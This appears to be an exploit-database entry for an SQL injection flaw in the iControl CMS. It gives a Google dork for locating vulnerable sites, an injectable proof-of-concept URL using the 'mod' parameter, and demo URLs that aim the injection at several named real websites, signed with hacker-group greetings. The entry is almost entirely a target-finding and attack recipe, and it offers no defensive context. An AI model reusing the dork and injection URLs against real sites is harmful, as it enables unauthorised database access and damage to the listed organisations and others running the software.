id: 19422
date: 09/18/2012
title: iControl => SQL injection Vulnerability
author: n/a
cves: 

Exploit Title: iControl™ => SQL injection Vulnerability
[~] web: www.thomathoma.com/index.php
[~] Google dork : Site design by ThomaThoma | Powered by iControl™="
[~] Greets : wlhaan hacker
###################################################################
poc:
www.site.com/index.php?fuseaction=p0004.&mod=[sqli]
demos:
http://www.thomathoma.com/index.php?fuseaction=p0004.&mod='
http://www.rmcofamerica.com/index.php?fuseaction=p0004.&mod='
http://www.metroplan.org/index.php?fuseaction=p0004.&mod='
http://www.fennellpurifoy.com/index.php?fuseaction=p0004.&mod=%27
###############
isalam hackers

v4-team.com



#  0day.today [2023-03-22]  #